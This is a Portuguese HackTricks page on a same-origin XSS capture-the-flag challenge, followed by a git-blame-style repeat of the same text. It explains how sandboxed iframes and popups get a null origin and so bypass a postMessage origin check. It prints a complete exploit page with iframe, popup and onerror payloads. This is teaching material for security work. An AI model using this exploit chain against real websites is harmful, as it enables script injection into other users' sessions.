hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md

# Bypassando SOP com Iframes - 1

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Iframes em SOP-1

Neste [**desafio**](https://github.com/terjanq/same-origin-xss) criado por [**NDevTK**](https://github.com/NDevTK) e [**Terjanq**](https://github.com/terjanq), você precisa explorar um XSS no código.
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
  const data = e.data;
  if (e.origin !== window.origin && data.identifier !== identifier) return;
  if (data.type === 'render') {
    renderContainer.innerHTML = data.body;
  }
}
```
O principal problema é que a [**página principal**](https://so-xss.terjanq.me) usa o DomPurify para enviar o `data.body`, então, para enviar seus próprios dados html para esse código, você precisa **burlar** `e.origin !== window.origin`.

Vamos ver a solução que eles propõem.

### Burlando SOP 1 (e.origin === null)

Quando `//example.org` é incorporado em um **iframe com sandbox**, a **origem** da página será **`null`**, ou seja, **`window.origin === null`**. Então, apenas incorporando o iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` poderíamos **forçar a origem `null`**.

Se a página fosse **incorporável**, você poderia burlar essa proteção dessa maneira (os cookies também podem precisar ser definidos como `SameSite=None`).

### Burlando SOP 2 (window.origin === null)

O fato menos conhecido é que, quando o valor do **sandbox `allow-popups` é definido**, a **popup aberta** herdará todos os **atributos com sandbox** a menos que `allow-popups-to-escape-sandbox` seja definido.\
Portanto, abrir uma **popup** de uma **origem nula** fará com que o **`window.origin`** dentro da popup também seja **`null`**.

### Solução do desafio

Portanto, para este desafio, pode-se **criar** um **iframe**, **abrir uma popup** para a página com o manipulador de código XSS vulnerável (`/iframe.php`), como `window.origin === e.origin` porque ambos são `null`, é possível **enviar um payload que irá explorar o XSS**.

Esse **payload** obterá o **identificador** e enviará um **XSS** de volta para a **página superior** (a página que abriu a popup), **que** mudará de **localização** para o **vulnerável** `/iframe.php`. Como o identificador é conhecido, não importa que a condição `window.origin === e.origin` não seja satisfeita (lembre-se, a origem é a **popup** do iframe que tem **origem** **`null`**) porque `data.identifier === identifier`. Então, o **XSS será acionado novamente**, desta vez na origem correta.
```html
<body>
  <script>
    f = document.createElement('iframe');
    
    // Needed flags
    f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
    
    // Second communication with /iframe.php (this is the top page relocated)
    // This will execute the alert in the correct origin
    const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
      x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
    },1000);`.replaceAll('\n',' ');
   
   // Initial communication
   // Open /iframe.php in a popup, both iframes and popup will have "null" as origin
   // Then, bypass window.origin === e.origin to steal the identifier and communicate
   // with the top with the second XSS payload
    f.srcdoc = `
    <h1>Click me!</h1>
    <script>
      onclick = e => {
        let w = open('https://so-xss.terjanq.me/iframe.php');
        onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
        setTimeout(_ => {
          w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
        }, 1000);
      };
    <\/script>
    `
    document.body.appendChild(f);
  </script>
</body>
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Bypassando SOP com Iframes - 1`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Iframes em SOP-1`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Neste [desafio](https://github.com/terjanq/same-origin-xss) criado por [NDevTK](https://github.com/NDevTK) e [Terjanq](https://github.com/terjanq), você precisa explorar um XSS no código.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```javascript
			`const identifier = '4a600cd2d4f9aa1cfb5aa786';`
			`onmessage = e => {`
			`const data = e.data;`
			`if (e.origin !== window.origin && data.identifier !== identifier) return;`
			`if (data.type === 'render') {`
			`renderContainer.innerHTML = data.body;`
			`}`
			`}`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			O principal problema é que a [página principal](https://so-xss.terjanq.me) usa o DomPurify para enviar o `data.body`, então, para enviar seus próprios dados html para esse código, você precisa burlar `e.origin !== window.origin`.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Vamos ver a solução que eles propõem.`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Burlando SOP 1 (e.origin === null)`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Quando `//example.org` é incorporado em um iframe com sandbox, a origem da página será `null`, ou seja, `window.origin === null`. Então, apenas incorporando o iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` poderíamos forçar a origem `null`.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Se a página fosse incorporável, você poderia burlar essa proteção dessa maneira (os cookies também podem precisar ser definidos como `SameSite=None`).
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Burlando SOP 2 (window.origin === null)`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			O fato menos conhecido é que, quando o valor do sandbox `allow-popups` é definido, a popup aberta herdará todos os atributos com sandbox a menos que `allow-popups-to-escape-sandbox` seja definido.\
			Portanto, abrir uma popup de uma origem nula fará com que o `window.origin` dentro da popup também seja `null`.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`### Solução do desafio`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Portanto, para este desafio, pode-se criar um iframe, abrir uma popup para a página com o manipulador de código XSS vulnerável (`/iframe.php`), como `window.origin === e.origin` porque ambos são `null`, é possível enviar um payload que irá explorar o XSS.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Esse payload obterá o identificador e enviará um XSS de volta para a página superior (a página que abriu a popup), que mudará de localização para o vulnerável `/iframe.php`. Como o identificador é conhecido, não importa que a condição `window.origin === e.origin` não seja satisfeita (lembre-se, a origem é a popup do iframe que tem origem `null`) porque `data.identifier === identifier`. Então, o XSS será acionado novamente, desta vez na origem correta.
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00			```html
			`<body>`
			`<script>`
			`f = document.createElement('iframe');`

			`// Needed flags`
			`f.sandbox = 'allow-scripts allow-popups allow-top-navigation';`

			`// Second communication with /iframe.php (this is the top page relocated)`
			`// This will execute the alert in the correct origin`
			const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
			`x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');`
			},1000);`.replaceAll('\n',' ');

			`// Initial communication`
			`// Open /iframe.php in a popup, both iframes and popup will have "null" as origin`
			`// Then, bypass window.origin === e.origin to steal the identifier and communicate`
			`// with the top with the second XSS payload`
			f.srcdoc = `
			`<h1>Click me!</h1>`
			`<script>`
			`onclick = e => {`
			`let w = open('https://so-xss.terjanq.me/iframe.php');`
			`onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';`
			`setTimeout(_ => {`
			`w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')`
			`}, 1000);`
			`};`
			`<\/script>`
			`
			`document.body.appendChild(f);`
			`</script>`
			`</body>`
			```
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3603] No subject 2022-10-13 00:56:34 +00:00
			`</details>`